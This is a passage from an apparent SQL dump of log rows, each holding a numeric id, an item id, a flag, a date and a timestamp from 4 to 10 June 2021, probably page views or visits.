13:31:16'),(23545,1602,1,'2021-06-04','2021-06-04 14:36:28'),(23546,87,1,'2021-06-04','2021-06-04 14:50:22'),(23547,1602,1,'2021-06-04','2021-06-04 15:08:23'),(23548,1730,1,'2021-06-04','2021-06-04 15:08:45'),(23549,1602,1,'2021-06-04','2021-06-04 15:10:09'),(23550,91,1,'2021-06-04','2021-06-04 15:10:33'),(23551,1604,1,'2021-06-04','2021-06-04 15:42:43'),(23552,1602,1,'2021-06-04','2021-06-04 17:02:46'),(23553,1544,1,'2021-06-04','2021-06-04 18:14:59'),(23554,1588,1,'2021-06-04','2021-06-04 19:39:16'),(23555,474,1,'2021-06-04','2021-06-04 19:51:03'),(23556,108,1,'2021-06-04','2021-06-04 20:05:17'),(23557,1606,1,'2021-06-04','2021-06-04 20:24:28'),(23558,2161,1,'2021-06-04','2021-06-04 20:44:12'),(23559,2150,1,'2021-06-04','2021-06-04 20:45:03'),(23560,2161,1,'2021-06-04','2021-06-04 20:45:48'),(23561,3263,1,'2021-06-04','2021-06-04 20:46:00'),(23562,2161,1,'2021-06-04','2021-06-04 20:46:33'),(23563,1602,1,'2021-06-04','2021-06-04 22:10:41'),(23564,1544,1,'2021-06-04','2021-06-04 22:25:09'),(23565,1608,1,'2021-06-04','2021-06-04 22:26:53'),(23566,1582,1,'2021-06-04','2021-06-04 23:23:41'),(23567,1582,1,'2021-06-04','2021-06-04 23:24:15'),(23568,68,1,'2021-06-04','2021-06-04 23:25:28'),(23569,1582,1,'2021-06-04','2021-06-04 23:26:18'),(23570,1586,1,'2021-06-05','2021-06-05 00:42:42'),(23571,1586,1,'2021-06-05','2021-06-05 00:42:59'),(23572,2617,1,'2021-06-05','2021-06-05 00:44:23'),(23573,80,1,'2021-06-05','2021-06-05 01:46:44'),(23574,68,1,'2021-06-05','2021-06-05 01:46:48'),(23575,2904,1,'2021-06-05','2021-06-05 01:46:52'),(23576,108,1,'2021-06-05','2021-06-05 01:46:55'),(23577,1606,1,'2021-06-05','2021-06-05 02:17:26'),(23578,108,1,'2021-06-05','2021-06-05 02:37:18'),(23579,1606,1,'2021-06-05','2021-06-05 03:45:53'),(23580,1544,1,'2021-06-05','2021-06-05 06:28:24'),(23581,1544,1,'2021-06-05','2021-06-05 07:59:00'),(23582,1606,1,'2021-06-05','2021-06-05 08:09:11'),(23583,1709,1,'2021-06-05','2021-06-05 09:00:03'),(23584,1586,1,'2021-06-05','2021-06-05 09:04:42'),(23585,1586,1,'2021-06-05','2021-06-05 09:04:45'),(23586,108,1,'2021-06-05','2021-06-05 10:58:28'),(23587,1734,1,'2021-06-05','2021-06-05 11:02:22'),(23588,3251,1,'2021-06-05','2021-06-05 11:37:40'),(23589,1602,1,'2021-06-05','2021-06-05 11:50:40'),(23590,1602,1,'2021-06-05','2021-06-05 11:50:52'),(23591,80,1,'2021-06-05','2021-06-05 11:53:00'),(23592,1602,1,'2021-06-05','2021-06-05 11:53:14'),(23593,1602,1,'2021-06-05','2021-06-05 12:06:24'),(23594,1598,1,'2021-06-05','2021-06-05 12:21:02'),(23595,335,1,'2021-06-05','2021-06-05 12:21:52'),(23596,335,1,'2021-06-05','2021-06-05 12:22:21'),(23597,1598,1,'2021-06-05','2021-06-05 12:22:27'),(23598,2309,1,'2021-06-05','2021-06-05 13:17:41'),(23599,1600,1,'2021-06-05','2021-06-05 13:36:30'),(23600,80,1,'2021-06-05','2021-06-05 13:52:24'),(23601,1709,1,'2021-06-05','2021-06-05 14:20:41'),(23602,3285,1,'2021-06-05','2021-06-05 14:36:17'),(23603,2161,1,'2021-06-05','2021-06-05 14:51:18'),(23604,3541,1,'2021-06-05','2021-06-05 16:26:27'),(23605,1600,1,'2021-06-05','2021-06-05 16:58:33'),(23606,1600,1,'2021-06-05','2021-06-05 16:58:34'),(23607,1745,1,'2021-06-05','2021-06-05 16:59:07'),(23608,1745,1,'2021-06-05','2021-06-05 16:59:07'),(23609,1737,1,'2021-06-05','2021-06-05 17:02:22'),(23610,1741,1,'2021-06-05','2021-06-05 17:03:28'),(23611,1741,1,'2021-06-05','2021-06-05 17:03:28'),(23612,1741,1,'2021-06-05','2021-06-05 17:03:37'),(23613,1739,1,'2021-06-05','2021-06-05 17:19:35'),(23614,1606,1,'2021-06-05','2021-06-05 17:40:25'),(23615,2161,1,'2021-06-05','2021-06-05 17:45:52'),(23616,2457,1,'2021-06-05','2021-06-05 18:15:54'),(23617,2309,1,'2021-06-05','2021-06-05 19:40:23'),(23618,2309,1,'2021-06-05','2021-06-05 19:41:32'),(23619,1594,1,'2021-06-05','2021-06-05 22:46:23'),(23620,2704,1,'2021-06-06','2021-06-06 00:52:30'),(23621,91,1,'2021-06-06','2021-06-06 00:53:50'),(23622,2704,1,'2021-06-06','2021-06-06 00:57:03'),(23623,76,1,'2021-06-06','2021-06-06 00:57:34'),(23624,89,1,'2021-06-06','2021-06-06 00:57:46'),(23625,2704,1,'2021-06-06','2021-06-06 00:58:13'),(23626,91,1,'2021-06-06','2021-06-06 00:59:46'),(23627,2989,1,'2021-06-06','2021-06-06 01:01:25'),(23628,1606,1,'2021-06-06','2021-06-06 03:26:58'),(23629,1606,1,'2021-06-06','2021-06-06 04:02:21'),(23630,1544,1,'2021-06-06','2021-06-06 05:23:56'),(23631,2558,1,'2021-06-06','2021-06-06 07:24:41'),(23632,1588,1,'2021-06-06','2021-06-06 09:37:49'),(23633,1709,1,'2021-06-06','2021-06-06 09:57:08'),(23634,1600,1,'2021-06-06','2021-06-06 12:55:48'),(23635,1600,1,'2021-06-06','2021-06-06 12:56:12'),(23636,80,1,'2021-06-06','2021-06-06 12:56:29'),(23637,1600,1,'2021-06-06','2021-06-06 12:57:17'),(23638,1544,1,'2021-06-06','2021-06-06 13:56:48'),(23639,1606,1,'2021-06-06','2021-06-06 14:36:37'),(23640,2178,1,'2021-06-06','2021-06-06 14:42:47'),(23641,1592,1,'2021-06-06','2021-06-06 16:42:04'),(23642,1596,1,'2021-06-06','2021-06-06 17:57:29'),(23643,1596,1,'2021-06-06','2021-06-06 17:58:20'),(23644,1728,1,'2021-06-06','2021-06-06 19:32:38'),(23645,1728,1,'2021-06-06','2021-06-06 19:33:01'),(23646,1602,1,'2021-06-06','2021-06-06 19:35:54'),(23647,1728,1,'2021-06-06','2021-06-06 19:38:02'),(23648,80,1,'2021-06-06','2021-06-06 19:38:22'),(23649,1544,1,'2021-06-06','2021-06-06 19:38:38'),(23650,1728,1,'2021-06-06','2021-06-06 19:39:16'),(23651,1602,1,'2021-06-06','2021-06-06 19:42:27'),(23652,80,1,'2021-06-06','2021-06-06 19:42:34'),(23653,1602,1,'2021-06-06','2021-06-06 19:42:37'),(23654,1582,1,'2021-06-06','2021-06-06 21:00:11'),(23655,2309,1,'2021-06-06','2021-06-06 21:31:21'),(23656,2309,1,'2021-06-06','2021-06-06 21:31:23'),(23657,2309,1,'2021-06-06','2021-06-06 21:32:06'),(23658,2309,1,'2021-06-06','2021-06-06 21:32:08'),(23659,2309,1,'2021-06-06','2021-06-06 21:33:49'),(23660,1582,1,'2021-06-06','2021-06-06 22:28:21'),(23661,108,1,'2021-06-07','2021-06-07 01:41:11'),(23662,2161,1,'2021-06-07','2021-06-07 06:04:20'),(23663,2309,1,'2021-06-07','2021-06-07 06:19:44'),(23664,2309,1,'2021-06-07','2021-06-07 06:46:14'),(23665,1608,1,'2021-06-07','2021-06-07 06:56:04'),(23666,1608,1,'2021-06-07','2021-06-07 06:56:16'),(23667,1592,1,'2021-06-07','2021-06-07 08:02:10'),(23668,91,1,'2021-06-07','2021-06-07 08:02:40'),(23669,1594,1,'2021-06-07','2021-06-07 08:03:49'),(23670,80,1,'2021-06-07','2021-06-07 08:04:05'),(23671,1709,1,'2021-06-07','2021-06-07 09:14:05'),(23672,1602,1,'2021-06-07','2021-06-07 09:16:22'),(23673,2309,1,'2021-06-07','2021-06-07 10:07:50'),(23674,1602,1,'2021-06-07','2021-06-07 10:22:28'),(23675,1602,1,'2021-06-07','2021-06-07 10:22:51'),(23676,1588,1,'2021-06-07','2021-06-07 10:35:29'),(23677,2248,1,'2021-06-07','2021-06-07 10:59:51'),(23678,2751,1,'2021-06-07','2021-06-07 11:22:44'),(23679,3278,1,'2021-06-07','2021-06-07 11:26:27'),(23680,80,1,'2021-06-07','2021-06-07 12:34:45'),(23681,2769,1,'2021-06-07','2021-06-07 12:49:58'),(23682,1594,1,'2021-06-07','2021-06-07 13:01:21'),(23683,1594,1,'2021-06-07','2021-06-07 13:07:15'),(23684,2911,1,'2021-06-07','2021-06-07 13:09:22'),(23685,2911,1,'2021-06-07','2021-06-07 13:09:55'),(23686,2911,1,'2021-06-07','2021-06-07 13:10:20'),(23687,2911,1,'2021-06-07','2021-06-07 13:12:47'),(23688,2911,1,'2021-06-07','2021-06-07 13:13:00'),(23689,2309,1,'2021-06-07','2021-06-07 13:13:18'),(23690,2911,1,'2021-06-07','2021-06-07 13:17:19'),(23691,3069,1,'2021-06-07','2021-06-07 13:17:29'),(23692,2911,1,'2021-06-07','2021-06-07 13:18:29'),(23693,1588,1,'2021-06-07','2021-06-07 13:43:28'),(23694,1588,1,'2021-06-07','2021-06-07 13:46:02'),(23695,2297,1,'2021-06-07','2021-06-07 14:01:02'),(23696,2991,1,'2021-06-07','2021-06-07 14:02:46'),(23697,3030,1,'2021-06-07','2021-06-07 14:05:40'),(23698,1606,1,'2021-06-07','2021-06-07 14:07:11'),(23699,2911,1,'2021-06-07','2021-06-07 14:11:39'),(23700,3006,1,'2021-06-07','2021-06-07 14:20:24'),(23701,1606,1,'2021-06-07','2021-06-07 14:46:44'),(23702,1594,1,'2021-06-07','2021-06-07 15:17:38'),(23703,1544,1,'2021-06-07','2021-06-07 15:48:07'),(23704,2159,1,'2021-06-07','2021-06-07 15:56:43'),(23705,2159,1,'2021-06-07','2021-06-07 15:56:44'),(23706,2252,1,'2021-06-07','2021-06-07 16:10:12'),(23707,1588,1,'2021-06-07','2021-06-07 16:16:37'),(23708,2252,1,'2021-06-07','2021-06-07 16:39:53'),(23709,1602,1,'2021-06-07','2021-06-07 17:30:58'),(23710,1602,1,'2021-06-07','2021-06-07 17:31:33'),(23711,1600,1,'2021-06-07','2021-06-07 17:47:19'),(23712,87,1,'2021-06-07','2021-06-07 17:50:48'),(23713,1600,1,'2021-06-07','2021-06-07 17:51:04'),(23714,1582,1,'2021-06-07','2021-06-07 17:51:33'),(23715,1592,1,'2021-06-07','2021-06-07 18:14:14'),(23716,2309,1,'2021-06-07','2021-06-07 18:51:11'),(23717,1592,1,'2021-06-07','2021-06-07 18:59:05'),(23718,1588,1,'2021-06-07','2021-06-07 19:10:59'),(23719,72,1,'2021-06-07','2021-06-07 19:35:56'),(23720,84,1,'2021-06-07','2021-06-07 19:36:39'),(23721,2161,1,'2021-06-07','2021-06-07 19:36:43'),(23722,87,1,'2021-06-07','2021-06-07 19:37:57'),(23723,87,1,'2021-06-07','2021-06-07 19:38:45'),(23724,84,1,'2021-06-07','2021-06-07 19:38:51'),(23725,84,1,'2021-06-07','2021-06-07 19:39:02'),(23726,1594,1,'2021-06-07','2021-06-07 20:11:19'),(23727,3066,1,'2021-06-07','2021-06-07 20:35:34'),(23728,1600,1,'2021-06-07','2021-06-07 20:43:59'),(23729,76,1,'2021-06-07','2021-06-07 20:44:41'),(23730,3287,1,'2021-06-07','2021-06-07 20:53:00'),(23731,3282,1,'2021-06-07','2021-06-07 20:54:07'),(23732,1544,1,'2021-06-07','2021-06-07 21:38:49'),(23733,2911,1,'2021-06-07','2021-06-07 22:34:21'),(23734,1606,1,'2021-06-08','2021-06-08 00:28:22'),(23735,3005,1,'2021-06-08','2021-06-08 01:33:36'),(23736,1544,1,'2021-06-08','2021-06-08 03:28:32'),(23737,2159,1,'2021-06-08','2021-06-08 04:36:06'),(23738,2159,1,'2021-06-08','2021-06-08 04:36:07'),(23739,2457,1,'2021-06-08','2021-06-08 05:34:44'),(23740,1718,1,'2021-06-08','2021-06-08 05:37:48'),(23741,108,1,'2021-06-08','2021-06-08 05:59:31'),(23742,3030,1,'2021-06-08','2021-06-08 07:12:05'),(23743,1600,1,'2021-06-08','2021-06-08 07:20:32'),(23744,487,1,'2021-06-08','2021-06-08 07:50:19'),(23745,487,1,'2021-06-08','2021-06-08 07:50:20'),(23746,487,1,'2021-06-08','2021-06-08 07:50:26'),(23747,3541,1,'2021-06-08','2021-06-08 09:03:06'),(23748,91,1,'2021-06-08','2021-06-08 09:04:14'),(23749,1608,1,'2021-06-08','2021-06-08 09:09:14'),(23750,1608,1,'2021-06-08','2021-06-08 09:09:23'),(23751,80,1,'2021-06-08','2021-06-08 09:10:52'),(23752,3087,1,'2021-06-08','2021-06-08 09:11:35'),(23753,3087,1,'2021-06-08','2021-06-08 09:11:53'),(23754,1594,1,'2021-06-08','2021-06-08 09:14:23'),(23755,1594,1,'2021-06-08','2021-06-08 09:14:49'),(23756,2911,1,'2021-06-08','2021-06-08 09:15:54'),(23757,1600,1,'2021-06-08','2021-06-08 09:17:32'),(23758,1588,1,'2021-06-08','2021-06-08 09:22:52'),(23759,68,1,'2021-06-08','2021-06-08 09:24:07'),(23760,1588,1,'2021-06-08','2021-06-08 09:29:55'),(23761,2457,1,'2021-06-08','2021-06-08 09:41:51'),(23762,1602,1,'2021-06-08','2021-06-08 09:47:54'),(23763,91,1,'2021-06-08','2021-06-08 09:48:51'),(23764,91,1,'2021-06-08','2021-06-08 09:52:21'),(23765,2159,1,'2021-06-08','2021-06-08 10:01:48'),(23766,76,1,'2021-06-08','2021-06-08 10:04:12'),(23767,1604,1,'2021-06-08','2021-06-08 10:08:56'),(23768,1586,1,'2021-06-08','2021-06-08 10:11:57'),(23769,2609,1,'2021-06-08','2021-06-08 10:13:29'),(23770,1594,1,'2021-06-08','2021-06-08 10:28:38'),(23771,68,1,'2021-06-08','2021-06-08 10:30:54'),(23772,1728,1,'2021-06-08','2021-06-08 10:57:22'),(23773,1602,1,'2021-06-08','2021-06-08 11:32:54'),(23774,80,1,'2021-06-08','2021-06-08 11:51:59'),(23775,80,1,'2021-06-08','2021-06-08 11:53:22'),(23776,1602,1,'2021-06-08','2021-06-08 12:08:55'),(23777,1602,1,'2021-06-08','2021-06-08 12:14:57'),(23778,1602,1,'2021-06-08','2021-06-08 12:18:34'),(23779,68,1,'2021-06-08','2021-06-08 12:23:10'),(23780,91,1,'2021-06-08','2021-06-08 12:33:34'),(23781,91,1,'2021-06-08','2021-06-08 12:33:34'),(23782,1588,1,'2021-06-08','2021-06-08 12:40:41'),(23783,68,1,'2021-06-08','2021-06-08 12:41:01'),(23784,1614,1,'2021-06-08','2021-06-08 12:45:38'),(23785,2178,1,'2021-06-08','2021-06-08 14:14:16'),(23786,68,1,'2021-06-08','2021-06-08 14:50:58'),(23787,2420,1,'2021-06-08','2021-06-08 14:51:14'),(23788,1600,1,'2021-06-08','2021-06-08 14:53:02'),(23789,3087,1,'2021-06-08','2021-06-08 15:19:30'),(23790,1778,1,'2021-06-08','2021-06-08 15:26:31'),(23791,3087,1,'2021-06-08','2021-06-08 15:28:25'),(23792,2161,1,'2021-06-08','2021-06-08 15:31:34'),(23793,1718,1,'2021-06-08','2021-06-08 15:37:32'),(23794,1718,1,'2021-06-08','2021-06-08 15:37:42'),(23795,1614,1,'2021-06-08','2021-06-08 15:53:59'),(23796,2704,1,'2021-06-08','2021-06-08 16:10:48'),(23797,1594,1,'2021-06-08','2021-06-08 16:13:09'),(23798,473,1,'2021-06-08','2021-06-08 16:19:51'),(23799,2704,1,'2021-06-08','2021-06-08 16:20:31'),(23800,1598,1,'2021-06-08','2021-06-08 17:04:12'),(23801,91,1,'2021-06-08','2021-06-08 17:05:51'),(23802,3261,1,'2021-06-08','2021-06-08 17:12:34'),(23803,2309,1,'2021-06-08','2021-06-08 17:57:16'),(23804,2904,1,'2021-06-08','2021-06-08 18:04:25'),(23805,2457,1,'2021-06-08','2021-06-08 18:22:53'),(23806,108,1,'2021-06-08','2021-06-08 19:04:56'),(23807,2911,1,'2021-06-08','2021-06-08 19:07:33'),(23808,1602,1,'2021-06-08','2021-06-08 19:13:17'),(23809,478,1,'2021-06-08','2021-06-08 19:31:55'),(23810,1600,1,'2021-06-08','2021-06-08 19:41:20'),(23811,1600,1,'2021-06-08','2021-06-08 19:41:41'),(23812,1586,1,'2021-06-08','2021-06-08 21:19:05'),(23813,1598,1,'2021-06-08','2021-06-08 22:01:53'),(23814,1610,1,'2021-06-08','2021-06-08 22:02:11'),(23815,3287,1,'2021-06-08','2021-06-08 23:19:32'),(23816,1606,1,'2021-06-08','2021-06-08 23:27:00'),(23817,2159,1,'2021-06-08','2021-06-08 23:42:31'),(23818,2159,1,'2021-06-08','2021-06-08 23:42:35'),(23819,2159,1,'2021-06-09','2021-06-09 00:15:31'),(23820,2159,1,'2021-06-09','2021-06-09 00:15:32'),(23821,1606,1,'2021-06-09','2021-06-09 00:16:13'),(23822,2309,1,'2021-06-09','2021-06-09 00:17:34'),(23823,2309,1,'2021-06-09','2021-06-09 00:17:34'),(23824,2159,1,'2021-06-09','2021-06-09 00:27:04'),(23825,2457,1,'2021-06-09','2021-06-09 03:07:18'),(23826,3261,1,'2021-06-09','2021-06-09 03:37:13'),(23827,1544,1,'2021-06-09','2021-06-09 04:32:20'),(23828,1602,1,'2021-06-09','2021-06-09 05:49:36'),(23829,1586,1,'2021-06-09','2021-06-09 07:33:39'),(23830,108,1,'2021-06-09','2021-06-09 07:47:59'),(23831,3030,1,'2021-06-09','2021-06-09 08:02:16'),(23832,1734,1,'2021-06-09','2021-06-09 08:22:00'),(23833,1604,1,'2021-06-09','2021-06-09 09:02:20'),(23834,2609,1,'2021-06-09','2021-06-09 09:28:11'),(23835,1606,1,'2021-06-09','2021-06-09 09:29:42'),(23836,1602,1,'2021-06-09','2021-06-09 10:47:56'),(23837,76,1,'2021-06-09','2021-06-09 10:58:17'),(23838,2609,1,'2021-06-09','2021-06-09 11:16:57'),(23839,2309,1,'2021-06-09','2021-06-09 11:27:11'),(23840,3181,1,'2021-06-09','2021-06-09 12:05:44'),(23841,1780,1,'2021-06-09','2021-06-09 12:18:28'),(23842,2309,1,'2021-06-09','2021-06-09 12:56:39'),(23843,2161,1,'2021-06-09','2021-06-09 13:07:28'),(23844,2161,1,'2021-06-09','2021-06-09 13:09:10'),(23845,1610,1,'2021-06-09','2021-06-09 13:36:43'),(23846,1610,1,'2021-06-09','2021-06-09 13:36:45'),(23847,1610,1,'2021-06-09','2021-06-09 13:36:56'),(23848,1594,1,'2021-06-09','2021-06-09 13:39:01'),(23849,1594,1,'2021-06-09','2021-06-09 14:17:55'),(23850,1594,1,'2021-06-09','2021-06-09 14:18:52'),(23851,3489,1,'2021-06-09','2021-06-09 14:29:39'),(23852,3104,1,'2021-06-09','2021-06-09 15:17:02'),(23853,1594,1,'2021-06-09','2021-06-09 15:53:49'),(23854,80,1,'2021-06-09','2021-06-09 16:23:26'),(23855,2911,1,'2021-06-09','2021-06-09 18:18:06'),(23856,2911,1,'2021-06-09','2021-06-09 18:20:27'),(23857,1606,1,'2021-06-09','2021-06-09 18:42:44'),(23858,2911,1,'2021-06-09','2021-06-09 19:50:47'),(23859,1608,1,'2021-06-09','2021-06-09 19:54:13'),(23860,3083,1,'2021-06-09','2021-06-09 21:59:24'),(23861,1586,1,'2021-06-09','2021-06-09 22:04:31'),(23862,3097,1,'2021-06-09','2021-06-09 23:03:19'),(23863,1594,1,'2021-06-09','2021-06-09 23:32:43'),(23864,3489,1,'2021-06-09','2021-06-09 23:41:18'),(23865,2309,1,'2021-06-09','2021-06-09 23:43:23'),(23866,1602,1,'2021-06-10','2021-06-10 00:24:54'),(23867,570,1,'2021-06-10','2021-06-10 02:21:05'),(23868,1596,1,'2021-06-10','2021-06-10 02:23:14'),(23869,1602,1,'2021-06-10','2021-06-10 02:24:44'),(23870,472,1,'2021-06-10','2021-06-10 02:41:18'),(23871,1588,1,'2021-06-10','2021-06-10 03:02:55'),(23872,1588,1,'2021-06-10','2021-06-10 03:04:50'),(23873,2751,1,'2021-06-10','2021-06-10 03:44:38'),(23874,1602,1,'2021-06-10','2021-06-10 04:22:20'),(23875,1602,1,'2021-06-10','2021-06-10 04:50:03'),(23876,1602,1,'2021-06-10','2021-06-10 04:50:06'),(23877,1602,1,'2021-06-10','2021-06-10 04:50:07'),(23878,1602,1,'2021-06-10','2021-06-10 04:51:33'),(23879,1586,1,'2021-06-10','2021-06-10 05:25:24'),(23880,80,1,'2021-06-10','2021-06-10 05:26:18'),(23881,80,1,'2021-06-10','2021-06-10 05:51:18'),(23882,80,1,'2021-06-10','2021-06-10 05:53:09'),(23883,102,1,'2021-06-10','2021-06-10 05:58:08'),(23884,570,1,'2021-06-10','2021-06-10 06:07:29'),(23885,1592,1,'2021-06-10','2021-06-10 06:19:01'),(23886,3030,1,'2021-06-10','2021-06-10 06:45:01'),(23887,474,1,'2021-06-10','2021-06-10 07:03:24'),(23888,1608,1,'2021-06-10','2021-06-10 08:48:36'),(23889,1608,1,'2021-06-10','2021-06-10 08:48:37'),(23890,3313,1,'2021-06-10','2021-06-10 09:23:59'),(23891,3006,1,'2021-06-10','2021-06-10 09:27:16'),(23892,570,1,'2021-06-10','2021-06-10 09:39:28'),(23893,570,1,'2021-06-10','2021-06-10 10:54:57'),(23894,91,1,'2021-06-10','2021-06-10 11:08:30'),(23895,1612,1,'2021-06-10','2021-06-10 11:12:38'),(23896,68,1,'2021-06-10','2021-06-10 11:17:05'),(23897,2159,1,'2021-06-10','2021-06-10 11:25:13'),(23898,2159,1,'2021-06-10','2021-06-10 11:25:17'),(23899,2159,1,'2021-06-10','2021-06-10 11:28:01'),(23900,2309,1,'2021-06-10','2021-06-10 11:32:18'),(23901,2309,1,'2021-06-10','2021-06-10 11:32:58'),(23902,2309,1,'2021-06-10','2021-06-10 11:33:55'),(23903,1606,1,'2021-06-10','2021-06-10 11:42:02'),(23904,1602,1,'2021-06-10','2021-06-10 11:42:39'),(23905,76,1,'2021-06-10','2021-06-10 11:45:04'),(23906,3245,1,'2021-06-10','2021-06-10 12:05:08'),(23907,1586,1,'2021-06-10','2021-06-10 12:06:52'),(23908,1743,1,'2021-06-10','2021-06-10 12:19:30'),(23909,1594,1,'2021-06-10','2021-06-10 12:24:16'),(23910,91,1,'2021-06-10','2021-06-10 12:29:50'),(23911,80,1,'2021-06-10','2021-06-10 12:30:35'),(23912,89,1,'2021-06-10','2021-06-10 12:30:53'),(23913,1594,1,'2021-06-10','2021-06-10 12:31:06'),(23914,1582,1,'2021-06-10','2021-06-10 12:36:35'),(23915,1600,1,'2021-06-10','2021-06-10 12:36:51'),(23916,1600,1,'2021-06-10','2021-06-10 12:41:36'),(23917,1594,1,'2021-06-10','2021-06-10 12:42:51'),(23918,3079,1,'2021-06-10','2021-06-10 12:43:30'),(23919,570,1,'2021-06-10','2021-06-10 12:55:31'),(23920,2490,1,'2021-06-10','2021-06-10 12:55:34'),(23921,570,1,'2021-06-10','2021-06-10 12:57:14'),(23922,68,1,'2021-06-10','2021-06-10 12:57:18'),(23923,3691,1,'2021-06-10','2021-06-10 13:10:33'),(23924,2309,1,'2021-06-10','2021-06-10 13:11:30'),(23925,1598,1,'2021-06-10','2021-06-10 13:17:04'),(23926,2309,1,'2021-06-10','2021-06-10 13:17:57'),(23927,1780,1,'2021-06-10','2021-06-10 13:24:19'),(23928,2704,1,'2021-06-10','2021-06-10 13:34:26'),(23929,2609,1,'2021-06-10','2021-06-10 13:40:58'),(23930,1604,1,'2021-06-10','2021-06-10 13:41:59'),(23931,2617,1,'2021-06-10','2021-06-10 13:46:34'),(23932,3245,1,'2021-06-10','2021-06-10 13:47:15'),(23933,2769,1,'2021-06-10','2021-06-10 13:48:19'),(23934,3531,1,'2021-06-10','2021-06-10 13:50:49'),(23935,3245,1,'2021-06-10','2021-06-10 13:50:54'),(23936,1608,1,'2021-06-10','2021-06-10 13:50:59'),(23937,2813,1,'2021-06-10','2021-06-10 13:56:32'),(23938,2769,1,'2021-06-10','2021-06-10 14:09:41'),(23939,1600,1,'2021-06-10','2021-06-10 14:17:26'),(23940,472,1,'2021-06-10','2021-06-10 14:20:22'),(23941,2395,1,'2021-06-10','2021-06-10 14:28:11'),(23942,1778,1,'2021-06-10','2021-06-10 14:32:25'),(23943,1718,1,'2021-06-10','2021-06-10 14:33:43'),(23944,3034,1,'2021-06-10','2021-06-10 14:35:14'),(23945,3313,1,'2021-06-10','2021-06-10 14:35:30'),(23946,2809,1,'2021-06-10','2021-06-10 14:37:39'),(23947,2704,1,'2021-06-10','2021-06-10 14:47:49'),(23948,1604,1,'2021-06-10','2021-06-10 14:48:56'),(23949,1604,1,'2021-06-10','2021-06-10 14:50:07'),(23950,1598,1,'2021-06-10','2021-06-10 14:52:02'),(23951,1610,1,'2021-06-10','2021-06-10 14:52:45'),(23952,1598,1,'2021-06-10','2021-06-10 14:53:47'),(23953,3257,1,'2021-06-10','2021-06-10 14:54:21'),(23954,468,1,'2021-06-10','2021-06-10 14:59:45'),(23955,1588,1,'2021-06-10','2021-06-10 15:01:08'),(23956,1596,1,'2021-06-10','2021-06-10 15:11:37'),(23957,468,1,'2021-06-10','2021-06-10 15:11:48'),(23958,2704,1,'2021-06-10','2021-06-10 15:16:18'),(23959,1718,1,'2021-06-10','2021-06-10 15:16:32'),(23960,3673,1,'2021-06-10','2021-06-10 15:46:11'),(23961,1588,1,'2021-06-10','2021-06-10 15:46:22'),(23962,80,1,'2021-06-10','2021-06-10 15:46:28'),(23963,2457,1,'2021-06-10','2021-06-10 15:51:13'),(23964,1747,1,'2021-06-10','2021-06-10 15:57:28'),(23965,3498,1,'2021-06-10','2021-06-10 16:12:43'),(23966,2395,1,'2021-06-10','2021-06-10 16:15:19'),(23967,2809,1,'2021-06-10','2021-06-10 16:17:29'),(23968,1592,1,'2021-06-10','2021-06-10 16:18:24'),(23969,2395,1,'2021-06-10','2021-06-10 16:18:36'),(23970,3030,1,'2021-06-10','2021-06-10 16:18:44'),(23971,2457,1,'2021-06-10','2021-06-10 16:18:47'),(23972,91,1,'2021-06-10','2021-06-10 16:21:54'),(23973,91,1,'2021-06-10','2021-06-10 16:21:57'),(23974,2617,1,'2021-06-10','2021-06-10 16:27:16'),(23975,91,1,'2021-06-10','2021-06-10 16:28:39'),(23976,2804,1,'2021-06-10','2021-06-10 16:29:00'),(23977,3285,1,'2021-06-10','2021-06-10 16:34:04'),(23978,3285,1,'2021-06-10','2021-06-10 16:34:05'),(23979,91,1,'2021-06-10','2021-06-10 16:34:23'),(23980,3285,1,'2021-06-10','2021-06-10 16:35:03'),(23981,91,1,'2021-06-10','2021-06-10 16:35:07'),(23982,3541,1,'2021-06-10','2021-06-10 16:36:00'),(23983,3541,1,'2021-06-10','2021-06-10 16:36:00'),(23984,1592,1,'2021-06-10','2021-06-10 16:44:30'),(23985,2609,1,'2021-06-10','2021-06-10 16:47:10'),(23986,3247,1,'2021-06-10','2021-06-10 16:48:28'),(23987,1602,1,'2021-06-10','2021-06-10 17:06:55'),(23988,3267,1,'2021-06-10','2021-06-10 17:08:49'),(23989,2178,1,'2021-06-10','2021-06-10 17:16:45'),(23990,1724,1,'2021-06-10','2021-06-10 17:19:19'),(23991,3307,1,'2021-06-10','2021-06-10 17:20:17'),(23992,2178,1,'2021-06-10','2021-06-10 17:22:17'),(23993,1770,1,'2021-06-10','2021-06-10 17:28:03'),(23994,2775,1,'2021-06-10','2021-06-10 17:29:02'),(23995,3259,1,'2021-06-10','2021-06-10 17:35:21'),(23996,3259,1,'2021-06-10','2021-06-10 17:36:17'),(23997,3104,1,'2021-06-10','2021-06-10 17:38:06'),(23998,1770,1,'2021-06-10','2021-06-10 17:40:27'),(23999,3486,1,'2021-06-10','2021-06-10 17:47:07'),(24000,469,1,'2021-06-10','2021-06-10 17:48:36'),(24001,3090,1,'2021-06-10','2021-06-10 17:49:56'),(24002,1544,1,'2021-06-10','2021-06-10 17:53:30'),(24003,1774,1,'2021-06-10','2021-06-10 17:59:43'),(24004,3127,1,'2021-06-10','2021-06-10 18:07:33'),(24005,470,1,'2021-06-10','2021-06-10 18:17:57'),(24006,3691,1,'2021-06-10','2021-06-10 18:24:10'),(24007,2410,1,'2021-06-10','2021-06-10 18:34:39'),(24008,3030,1,'2021-06-10','2021-06-10 18:37:24'),(24009,2813,1,'2021-06-10','2021-06-10 18:37:38'),(24010,1766,1,'2021-06-10','2021-06-10 18:39:34'),(24011,91,1,'2021-06-10','2021-06-10 18:41:30'),(24012,2410,1,'2021-06-10','2021-06-10 18:42:50'),(24013,3109,1,'2021-06-10','2021-06-10 18:46:33'),(24014,2309,1,'2021-06-10','2021-06-10 18:57:20'),(24015,1602,1,'2021-06-10','2021-06-10 19:08:07'),(24016,3271,1,'2021-06-10','2021-06-10 19:08:35'),(24017,74,1,'2021-06-10','2021-06-10 19:09:42'),(24018,3430,1,'2021-06-10','2021-06-10 19:09:47'),(24019,2309,1,'2021-06-10','2021-06-10 19:27:24'),(24020,2309,1,'2021-06-10','2021-06-10 19:27:37'),(24021,1594,1,'2021-06-10','2021-06-10 19:35:42'),(24022,2804,1,'2021-06-10','2021-06-10 19:38:38'),(24023,1614,1,'2021-06-10','2021-06-10 19:39:24'),(24024,3313,1,'2021-06-10','2021-06-10 19:40:25'),(24025,1594,1,'2021-06-10','2021-06-10 19:44:06'),(24026,2419,1,'2021-06-10','2021-06-10 19:46:59'),(24027,1588,1,'2021-06-10','2021-06-10 19:54:45'),(24028,1602,1,'2021-06-10','2021-06-10 19:55:31'),(24029,1870,1,'2021-06-10','2021-06-10 19:57:36'),(24030,2419,1,'2021-06-10','2021-06-10 